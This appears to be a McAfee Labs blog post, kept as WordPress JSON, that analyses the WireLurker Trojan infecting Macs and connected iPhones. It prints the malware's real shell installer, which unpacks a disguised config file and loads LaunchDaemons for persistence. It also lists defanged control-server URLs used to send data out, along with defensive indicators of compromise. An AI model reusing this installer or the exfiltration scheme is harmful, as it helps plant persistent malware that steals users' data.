{"id":39027,"date":"2014-11-10T16:28:52","date_gmt":"2014-11-11T00:28:52","guid":{"rendered":"http:\/\/blogs.mcafee.com\/?p=39027"},"modified":"2025-06-02T00:57:47","modified_gmt":"2025-06-02T07:57:47","slug":"hooking-mac","status":"publish","type":"post","link":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/hooking-mac\/","title":{"rendered":"Chinese Trojan Hooks Macs, iPhones"},"content":{"rendered":"<p><em>\u201cDistrust and caution are the parents of security\u201d\u2013Benjamin Franklin<\/em><\/p>\n<p>A recent threat targeting Chinese users of Mac OS X and iPhone came to light yesterday. The malware, called WireLurker, is distributed by the Chinese third-party app store Maiyadi. Since the threat&#8217;s discovery, more than 400 applications containing the Trojan were identified at the store.<\/p>\n<p>Two very important characteristics of this Trojan are that infection is propagated from Mac OS X to any iOS device that is connected to the machine, and that even non-jailbroken devices are affected.<\/p>\n<p>The malware arrives when the user downloads the Trojanized application from the alternate app store. The Trojan executes and installs its files to the following folder:<\/p>\n<ul>\n<li>\/usr\/local\/machook<\/li>\n<\/ul>\n<p>The files installed in this folder are then installed as a persistent service in Mac OS X, as shown in the following script:<\/p>\n<pre style=\"padding-left: 30px;\">#!\/bin\/sh\r\nbasepath=`dirname $0`\r\nmkdir -p \/usr\/local\/machook\/\r\nunzip -o -q $basepath\/FontMap1.cfg -d \/usr\/local\/machook\/\r\nsleep 1\r\ncp -rf \/usr\/local\/machook\/com.apple.machook_damon.plist \/Library\/LaunchDaemons\/\r\n<strong>\/bin\/launchctl load -wF \/Library\/LaunchDaemons\/com.apple.machook_damon.plist\r\n<\/strong>cp -rf \/usr\/local\/machook\/globalupdate \/usr\/bin\/\r\ncp -rf \/usr\/local\/machook\/com.apple.globalupdate.plist \/Library\/LaunchDaemons\/\r\n<strong>\/bin\/launchctl load -wF \/Library\/LaunchDaemons\/com.apple.globalupdate.plist\r\n<\/strong>rm -rf \/Users\/Shared\/FontMap1.cfg\r\nrm -rf \/Users\/Shared\/start.sh<\/pre>\n<p>At this point, the malware installs a USB hook callback, and waits for any iOS device to be connected to any USB port. It will also report the infection to its control server at this URL:<\/p>\n<ul>\n<li>hxxp:\/\/ www. comeinbaby. com\/app\/ getversion.php ?v=%@&amp;adid=%@<\/li>\n<\/ul>\n<p>Once a device is detected, the malware on Mac OS X performs the following actions to compromise the iOS device:<\/p>\n<ul>\n<li>Get a list of all applications installed in the device<\/li>\n<li>Get the hardware ID of the device<\/li>\n<li>Submit this information to the control server<\/li>\n<li>Create a backup on the local disk of all applications on the device<\/li>\n<li>Inject the malicious iOS binary into each application<\/li>\n<li>Install the applications on the device<\/li>\n<\/ul>\n<p style=\"text-align: center;\"><em>Code to get the list of installed applications on the device.<\/em><\/p>\n<p>The malware will perform the preceding actions even if the device is not jail broken. To do this, the malware will attempt to install a security profile in the device. This profile contains a fake digital certificate to sign the Trojan packages.<\/p>\n<p>If the user accepts the installation of the security profile, any application signed by the digital certificate can be installed and executed without warning to the user.<\/p>\n<p>After the Trojanized applications are installed on the device, any time the user starts one of them the malware will execute, too.<\/p>\n<p>The malware can steal user information including contacts, bookmarks, email, etc. It can also download and install additional applications to the device without user consent. We have not yet seen other malicious files installed, but it is possible.<\/p>\n<p>This behavior has been reported by users of the Maiyadi app store since August, but may have been overlooked because the blog is not in English:<\/p>\n<p>&nbsp;<\/p>\n<p style=\"text-align: center;\"><em>A user reporting the Machook behavior on August 21.<\/em><\/p>\n<p>All files related to the attack seem to have been developed by the same authors. The following information is present in the iOS malware:<\/p>\n<pre style=\"padding-left: 30px;\">com.maiyadi.start\r\n subject.CN\r\n &amp;iPhone Developer: li tjcy (967X86AAT5)\r\n &lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt;\r\n &lt;!DOCTYPE plist PUBLIC \"-\/\/Apple\/\/DTD PLIST 1.0\/\/EN\" \"\r\n &lt;plist version=\"1.0\"&gt;\r\n &lt;dict&gt;\r\n &lt;key&gt;application-identifier&lt;\/key&gt;\r\n &lt;string&gt;YK3M5NA37D.com.maiyadi.start&lt;\/string&gt;<\/pre>\n<p>And the debug information contain the names of two authors:<\/p>\n<ul>\n<li>\u00a0\/<strong>Users\/lifei<\/strong>\/Library\/Developer\/Xcode\/DerivedData\/myProject-bempnuunysxoafcdeokuvvfigmze\/Build\/Intermediates\/mac_start.build\/Release\/mac_start.build\/Objects-normal\/x86_64\/main.o&#8217;<\/li>\n<li>\/<strong>Users\/kaifazhe<\/strong>\/Library\/Developer\/Xcode\/DerivedData\/myProject-bempnuunysxoafcdeokuvvfigmze\/Build\/Intermediates\/updateVer.build\/Release\/updateVer.build\/Objects-normal\/x86_64\/main.o<\/li>\n<\/ul>\n<h2><strong>Indicators of Compromise<\/strong><\/h2>\n<p>The malware offers many indicators of compromise that can help detect infected machines, including the presence of one of the following files or folders:<\/p>\n<ul>\n<li>\/usr\/local\/machook<\/li>\n<li>\/tmp\/machook.log<\/li>\n<li>\/Library\/LaunchDaemons\/com.apple.machook_damon.plist<\/li>\n<li>\/Library\/LaunchDaemons\/com.apple.globalupdate.plist<\/li>\n<\/ul>\n<p>One or more of the following processes:<\/p>\n<ul>\n<li>machook<\/li>\n<li>update<\/li>\n<li>start.sh<\/li>\n<li>watch.sh<\/li>\n<li>WatchProc<\/li>\n<li>Periodicdate<\/li>\n<li>Globalupdate<\/li>\n<li>Manhua<\/li>\n<li>WhatsApp<\/li>\n<\/ul>\n<p>Network connections to the following domains\/urls:<\/p>\n<ul>\n<li>hxxp:\/\/ www. comeinbaby. com\/app\/ getversion.php ?v=%@&amp;adid=%@<\/li>\n<li>hxxp:\/\/ www. comeinbaby. com\/app\/ app.php ?sn=%s&amp;pn=%s&amp;mn=%s&amp;pv=%s&amp;appid=%s&amp;os=macservice&amp;pt=%s&amp;msn=%@&amp;yy=%s<\/li>\n<li>hxxp:\/\/ www. comeinbaby. com\/mac\/saveinfo.php<\/li>\n<li>hxxp:\/\/ www. comeinbaby. com\/mac\/ getipa2.php?sn=%@<\/li>\n<li>hxxp:\/ \/www. manhuaba. com.cn\/active\/?udid=%@<\/li>\n<\/ul>\n<p>The connections above may use the following user agent:<\/p>\n<ul>\n<li>User-Agent: globalupdate (unknown version) CFNetwork\/720.0.9 Darwin\/14.0.0<\/li>\n<\/ul>\n<p>List of known MD5s:<\/p>\n<ul>\n<li>15E8728B410BFFFDE8D54651A6EFD162\u00a0 BikeBaron<\/li>\n<li>2B79534F22A89F73D4BB45848659B59B\u00a0 pphelper<\/li>\n<li>358C48414219FDBBBBCFF90C97295DFF\u00a0 watch.sh<\/li>\n<li>3FA4E5FEC53DFC9FC88CED651AA858C6\u00a0 start (2).sh<\/li>\n<li>582FCD682F0F520E95AF1D0713639864\u00a0 sfbase_v4000.dylib<\/li>\n<li>5B43DF4FAC4CAC52412126A6C604853C\u00a0 machook<\/li>\n<li>6B74F8A5B055635BD306D06F20B6D0BC\u00a0 PPAppInstall_qudaobao<\/li>\n<li>7B9E685E89B8C7E11F554B05CDD6819A\u00a0 7b9e685e89b8c7e11f554b05cdd6819a<\/li>\n<li>9037CF29ED485DAE11E22955724A00E7\u00a0 globalupdate<\/li>\n<li>93658B52B0F538C4F3E17FDF3860778C\u00a0 update<\/li>\n<li>9ADFD4344092826CA39BBC441A9EB96F\u00a0 start.sh<\/li>\n<li>A72FDBACFD5BE14631437D0AB21FF960\u00a0 WatchProc<\/li>\n<li>A8DFBD54DA805D3C52AFC521AB7B354B\u00a0 itunesupdate<\/li>\n<li>AA6FE189BAA355A65E6AAFAC1E765F41\u00a0 periodicdate<\/li>\n<li>AB8E4D0C0182BA9699E048B067F7F669\u00a0 manhua<\/li>\n<li>BC3AA0142FB15EA65DE7833D65A70E36\u00a0 sfbase.dylib<\/li>\n<li>C4264B9607A68DE8B9BBBE30436F5F28\u00a0 com.apple.appstore.PluginHelper<\/li>\n<li>C9841E34DA270D94B35AE3F724160D5E\u00a0 CleanApp<\/li>\n<li>DCA13B4FF64BCD6876C13BBB4A22F450\u00a0 com.apple.MailServiceAgentHelper<\/li>\n<li>DEA26A823839B1B3A810D5E731D76AA2\u00a0 stty5.11.pl<\/li>\n<li>E03402006332A6E17C36E569178D2097\u00a0 systemkeychain-helper<\/li>\n<li>E3A61139735301B866D8D109D715F102\u00a0 start<\/li>\n<li>E40DE392C613CD2F9E1E93C6FFD05246\u00a0 sfbase_v4001.dylib<\/li>\n<li>ECB429951985837513FDF854E49D0682\u00a0 machook (3)<\/li>\n<\/ul>\n<p>Windows Version:<\/p>\n<ul>\n<li>ECA91FA7E7350A4D2880D341866ADF35\u00a0 WhatsAppMessenger 2.11.7.exe<\/li>\n<\/ul>\n<h2><strong>Other Resources<\/strong><\/h2>\n<p>A detailed analysis by Palo Alto Networks of both the Windows and Mac OS X variants of this malware can be found at these links:<\/p>\n<ul>\n<li><a href=\"http:\/\/researchcenter.paloaltonetworks.com\/2014\/11\/wirelurker-windows\/#more-7274\" target=\"_blank\" rel=\"noopener noreferrer\">Research\u00a0Palo Alto<em>: WireLurker for Windows<\/em><\/a><\/li>\n<li><a href=\"https:\/\/www.paloaltonetworks.com\/content\/dam\/paloaltonetworks-com\/en_US\/assets\/pdf\/reports\/Unit_42\/unit42-wirelurker.pdf\" target=\"_blank\" rel=\"noopener noreferrer\"><em>WireLurker: A New Era in iOS and OS X Malware<\/em><\/a><\/li>\n<\/ul>\n<p>As usual, remember that to be safe, you have to act safely. Never download applications from unknown or untrusted sources, don\u2019t click on links sent by any messaging system, even if they appear to come from a known person, and keep all your software up to date and your security products enabled.<\/p>\n<p>McAfee users are protected against this threat in the latest DATs. The threat is detected as OSX\/Machook, OSX\/Machook.a, OSX\/Machook.b, and OSX\/Machook.c. SiteAdvisor users are also protected from downloading the malware because the domain is already classified as malicious:<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u201cDistrust and caution are the parents of security\u201d\u2013Benjamin Franklin A recent threat targeting Chinese users of Mac OS X and&#8230;<\/p>\n","protected":false},"author":671,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[442],"tags":[40,338,124,180,214],"coauthors":[3919],"class_list":["post-39027","post","type-post","status-publish","format-standard","hentry","category-mcafee-labs","tag-apple","tag-endpoint-protection","tag-global-threat-intelligence","tag-malware","tag-mobile-security1"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.4 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Hooking the Mac - Mac OS X Wirelurker malware<\/title>\n<meta name=\"description\" content=\"\u201cDistrust and caution are the parents of security\u201d\u2013Benjamin Franklin A recent threat targeting Chinese users of Mac OS X and iPhone came to light\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Hooking the Mac - Mac OS X Wirelurker malware\" \/>\n<meta property=\"og:description\" content=\"\u201cDistrust and caution are the parents of security\u201d\u2013Benjamin Franklin A recent threat targeting Chinese users of Mac OS X and iPhone came to light\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/hooking-mac\/\" \/>\n<meta property=\"og:site_name\" content=\"McAfee Blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/McAfee\/\" \/>\n<meta property=\"article:published_time\" content=\"2014-11-11T00:28:52+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-06-02T07:57:47+00:00\" \/>\n<meta name=\"author\" content=\"McAfee\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@McAfee\" \/>\n<meta name=\"twitter:site\" content=\"@McAfee\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"McAfee\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/hooking-mac\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/hooking-mac\/\"},\"author\":{\"name\":\"McAfee\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/54def583f45ad6d756d23342342d6199\"},\"headline\":\"Chinese Trojan Hooks Macs, iPhones\",\"datePublished\":\"2014-11-11T00:28:52+00:00\",\"dateModified\":\"2025-06-02T07:57:47+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/hooking-mac\/\"},\"wordCount\":1048,\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"keywords\":[\"Apple\",\"endpoint protection\",\"global threat intelligence\",\"malware\",\"mobile security\"],\"articleSection\":[\"McAfee Labs\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/hooking-mac\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/hooking-mac\/\",\"name\":\"Hooking the Mac - Mac OS X Wirelurker malware\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\"},\"datePublished\":\"2014-11-11T00:28:52+00:00\",\"dateModified\":\"2025-06-02T07:57:47+00:00\",\"description\":\"\u201cDistrust and caution are the parents of security\u201d\u2013Benjamin Franklin A recent threat targeting Chinese users of Mac OS X and iPhone came to light\",\"breadcrumb\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/hooking-mac\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/hooking-mac\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/hooking-mac\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Blog\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Other Blogs\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"McAfee Labs\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/\"},{\"@type\":\"ListItem\",\"position\":4,\"name\":\"Chinese Trojan Hooks Macs, iPhones\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"name\":\"McAfee Blog\",\"description\":\"Internet Security News\",\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\",\"name\":\"McAfee\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"width\":1286,\"height\":336,\"caption\":\"McAfee\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/McAfee\/\",\"https:\/\/x.com\/McAfee\",\"https:\/\/www.linkedin.com\/company\/mcafee\/\",\"https:\/\/www.youtube.com\/McAfee\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/54def583f45ad6d756d23342342d6199\",\"name\":\"McAfee\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/7027f28dd0ec2b30c201e9c884669577\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/04\/McAfee-Logo-96x96.jpg\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/04\/McAfee-Logo-96x96.jpg\",\"caption\":\"McAfee\"},\"description\":\"Questions about Blog Central? Email mcafeesocialmedia@mcafee.com for answers.\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/author\/rubywilliams\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Hooking the Mac - Mac OS X Wirelurker malware","description":"\u201cDistrust and caution are the parents of security\u201d\u2013Benjamin Franklin A recent threat targeting Chinese users of Mac OS X and iPhone came to light","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"og_locale":"en_US","og_type":"article","og_title":"Hooking the Mac - Mac OS X Wirelurker malware","og_description":"\u201cDistrust and caution are the parents of security\u201d\u2013Benjamin Franklin A recent threat targeting Chinese users of Mac OS X and iPhone came to light","og_url":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/hooking-mac\/","og_site_name":"McAfee Blog","article_publisher":"https:\/\/www.facebook.com\/McAfee\/","article_published_time":"2014-11-11T00:28:52+00:00","article_modified_time":"2025-06-02T07:57:47+00:00","author":"McAfee","twitter_card":"summary_large_image","twitter_creator":"@McAfee","twitter_site":"@McAfee","twitter_misc":{"Written by":"McAfee","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/hooking-mac\/#article","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/hooking-mac\/"},"author":{"name":"McAfee","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/54def583f45ad6d756d23342342d6199"},"headline":"Chinese Trojan Hooks Macs, iPhones","datePublished":"2014-11-11T00:28:52+00:00","dateModified":"2025-06-02T07:57:47+00:00","mainEntityOfPage":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/hooking-mac\/"},"wordCount":1048,"publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"keywords":["Apple","endpoint protection","global threat intelligence","malware","mobile security"],"articleSection":["McAfee Labs"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/hooking-mac\/","url":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/hooking-mac\/","name":"Hooking the Mac - Mac OS X Wirelurker malware","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/#website"},"datePublished":"2014-11-11T00:28:52+00:00","dateModified":"2025-06-02T07:57:47+00:00","description":"\u201cDistrust and caution are the parents of security\u201d\u2013Benjamin Franklin A recent threat targeting Chinese users of Mac OS X and iPhone came to light","breadcrumb":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/hooking-mac\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/hooking-mac\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/hooking-mac\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Blog","item":"https:\/\/www.mcafee.com\/blogs\/"},{"@type":"ListItem","position":2,"name":"Other Blogs","item":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/"},{"@type":"ListItem","position":3,"name":"McAfee Labs","item":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/"},{"@type":"ListItem","position":4,"name":"Chinese Trojan Hooks Macs, iPhones"}]},{"@type":"WebSite","@id":"https:\/\/www.mcafee.com\/blogs\/#website","url":"https:\/\/www.mcafee.com\/blogs\/","name":"McAfee Blog","description":"Internet Security News","publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.mcafee.com\/blogs\/#organization","name":"McAfee","url":"https:\/\/www.mcafee.com\/blogs\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","width":1286,"height":336,"caption":"McAfee"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/McAfee\/","https:\/\/x.com\/McAfee","https:\/\/www.linkedin.com\/company\/mcafee\/","https:\/\/www.youtube.com\/McAfee"]},{"@type":"Person","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/54def583f45ad6d756d23342342d6199","name":"McAfee","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/7027f28dd0ec2b30c201e9c884669577","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/04\/McAfee-Logo-96x96.jpg","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/04\/McAfee-Logo-96x96.jpg","caption":"McAfee"},"description":"Questions about Blog Central? Email mcafeesocialmedia@mcafee.com for answers.","url":"https:\/\/www.mcafee.com\/blogs\/author\/rubywilliams\/"}]}},"_links":{"self":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/39027","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/users\/671"}],"replies":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/comments?post=39027"}],"version-history":[{"count":3,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/39027\/revisions"}],"predecessor-version":[{"id":214799,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/39027\/revisions\/214799"}],"wp:attachment":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/media?parent=39027"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/categories?post=39027"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/tags?post=39027"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/coauthors?post=39027"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}